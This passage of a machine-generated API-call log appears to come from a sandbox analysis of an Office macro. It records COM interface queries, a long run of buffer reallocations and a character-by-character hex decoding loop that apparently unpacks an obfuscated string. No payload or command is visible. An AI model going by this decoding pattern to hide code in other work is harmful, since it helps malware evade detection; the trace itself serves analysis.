riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.831] IUnknown:Release (This=0xa02b420) returned 0x4 [0160.831] IUnknown:AddRef (This=0xa121118) returned 0x3 [0160.831] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.831] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.831] IUnknown:Release (This=0xa121118) returned 0x2 [0160.832] IUnknown:AddRef (This=0xa121698) returned 0x8 [0160.832] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.832] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.832] IUnknown:Release (This=0xa121698) returned 0x7 [0160.832] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0160.832] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.832] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.832] IUnknown:Release (This=0xa02ae48) returned 0x4 [0160.832] GetAsyncKeyState (vKey=27) returned 0 [0160.833] GetUserDefaultLCID () returned 0x409 [0160.833] malloc (_Size=0xa0) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x140) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x1e0) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x280) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x320) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x3c0) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x460) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x500) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x5a0) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x640) returned 0x48ab310 [0160.834] realloc (_Block=0x48ab310, _Size=0x6e0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x780) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x820) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x8c0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x960) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xa00) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xaa0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xb40) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xbe0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xc80) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xd20) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xdc0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xe60) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xf00) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0xfa0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1040) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x10e0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1180) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1220) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x12c0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1360) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1400) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x14a0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1540) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x15e0) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1680) returned 0x48ab310 [0160.835] realloc (_Block=0x48ab310, _Size=0x1720) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x17c0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1860) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1900) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x19a0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1a40) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1ae0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1b80) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1c20) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1cc0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1d60) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1e00) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1ea0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1f40) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x1fe0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2080) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2120) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x21c0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2260) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2300) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x23a0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2440) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x24e0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2580) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2620) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x26c0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2760) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2800) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x28a0) returned 0x48ab310 [0160.836] realloc (_Block=0x48ab310, _Size=0x2940) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x29e0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2a80) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2b20) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2bc0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2c60) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2d00) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2da0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2e40) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2ee0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x2f80) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3020) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x30c0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3160) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3200) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x32a0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3340) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x33e0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3480) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3520) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x35c0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3660) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3700) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x37a0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3840) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x38e0) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3980) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3a20) returned 0x48ab310 [0160.837] realloc (_Block=0x48ab310, _Size=0x3ac0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3b60) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3c00) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3ca0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3d40) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3de0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3e80) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3f20) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x3fc0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4060) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4100) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x41a0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4240) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x42e0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4380) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4420) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x44c0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4560) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4600) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x46a0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4740) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x47e0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4880) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4920) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x49c0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4a60) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4b00) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4ba0) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4c40) returned 0x48ab310 [0160.838] realloc (_Block=0x48ab310, _Size=0x4ce0) returned 0xc50dfd0 [0160.840] realloc (_Block=0xc50dfd0, _Size=0x4d80) returned 0xc50dfd0 [0160.840] realloc (_Block=0xc50dfd0, _Size=0x4e20) returned 0xc50dfd0 [0160.840] realloc (_Block=0xc50dfd0, _Size=0x4ec0) returned 0xc50dfd0 [0160.840] realloc (_Block=0xc50dfd0, _Size=0x4f60) returned 0xc50dfd0 [0160.840] realloc (_Block=0xc50dfd0, _Size=0x5000) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x50a0) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x5140) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x51e0) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x5280) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x5320) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x53c0) returned 0xc512f40 [0160.841] realloc (_Block=0xc512f40, _Size=0x5460) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5500) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x55a0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5640) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x56e0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5780) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5820) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x58c0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5960) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5a00) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5aa0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5b40) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5be0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5c80) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5d20) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5dc0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5e60) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5f00) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x5fa0) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x6040) returned 0xc512f40 [0160.842] realloc (_Block=0xc512f40, _Size=0x60e0) returned 0xc518f90 [0160.843] realloc (_Block=0xc518f90, _Size=0x6180) returned 0xc518f90 [0160.843] realloc (_Block=0xc518f90, _Size=0x6220) returned 0xc518f90 [0160.843] realloc (_Block=0xc518f90, _Size=0x62c0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6360) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6400) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x64a0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6540) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x65e0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6680) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6720) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x67c0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6860) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6900) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x69a0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6a40) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6ae0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6b80) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6c20) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6cc0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6d60) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6e00) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6ea0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6f40) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x6fe0) returned 0xc518f90 [0160.844] realloc (_Block=0xc518f90, _Size=0x7080) returned 0xc50dfd0 [0160.844] realloc (_Block=0xc50dfd0, _Size=0x7120) returned 0xc50dfd0 [0160.844] realloc (_Block=0xc50dfd0, _Size=0x71c0) returned 0xc50dfd0 [0160.844] realloc (_Block=0xc50dfd0, _Size=0x7260) returned 0xc50dfd0 [0160.844] realloc (_Block=0xc50dfd0, _Size=0x7300) returned 0xc50dfd0 [0160.844] realloc (_Block=0xc50dfd0, _Size=0x73a0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7440) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x74e0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7580) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7620) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x76c0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7760) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7800) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x78a0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7940) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x79e0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7a80) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7b20) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7bc0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7c60) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7d00) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7da0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7e40) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7ee0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x7f80) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8020) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x80c0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8160) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8200) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x82a0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8340) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x83e0) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8480) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x8520) returned 0xc50dfd0 [0160.845] realloc (_Block=0xc50dfd0, _Size=0x85c0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8660) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8700) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x87a0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8840) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x88e0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8980) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8a20) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8ac0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8b60) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8c00) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8ca0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8d40) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8de0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8e80) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8f20) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x8fc0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9060) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9100) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x91a0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9240) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x92e0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9380) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9420) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x94c0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9560) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9600) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x96a0) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x9740) returned 0xc50dfd0 [0160.846] realloc (_Block=0xc50dfd0, _Size=0x97e0) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9880) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9920) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x99c0) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9a60) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9b00) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9ba0) returned 0xc50dfd0 [0160.847] realloc (_Block=0xc50dfd0, _Size=0x9c40) returned 0xc50dfd0 [0174.751] free (_Block=0x12350040) [0174.767] GetAsyncKeyState (vKey=27) returned 0 [0174.767] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.768] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.768] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.818] GetUserDefaultLCID () returned 0x409 [0174.818] malloc (_Size=0xa0) returned 0x11f50080 [0174.818] free (_Block=0x11f50080) [0174.819] VarBstrCat (in: bstrLeft="&H", bstrRight="c5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.819] GetUserDefaultLCID () returned 0x409 [0174.819] VarI2FromStr (in: strIn="&Hc5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.859] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96553d8, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0174.859] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.860] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.860] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.860] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.860] GetUserDefaultLCID () returned 0x409 [0174.860] malloc (_Size=0xa0) returned 0x11f50080 [0174.860] free (_Block=0x11f50080) [0174.861] VarBstrCat (in: bstrLeft="&H", bstrRight="c4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.861] GetUserDefaultLCID () returned 0x409 [0174.861] VarI2FromStr (in: strIn="&Hc4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.861] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0174.861] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.861] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.861] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.861] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.861] GetUserDefaultLCID () returned 0x409 [0174.861] malloc (_Size=0xa0) returned 0x11f50080 [0174.861] free (_Block=0x11f50080) [0174.862] VarBstrCat (in: bstrLeft="&H", bstrRight="cb", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.862] GetUserDefaultLCID () returned 0x409 [0174.862] VarI2FromStr (in: strIn="&Hcb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.862] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655438, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0174.862] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.862] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.862] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.862] VarAdd (in: pvarLeft=0xa025ed0, 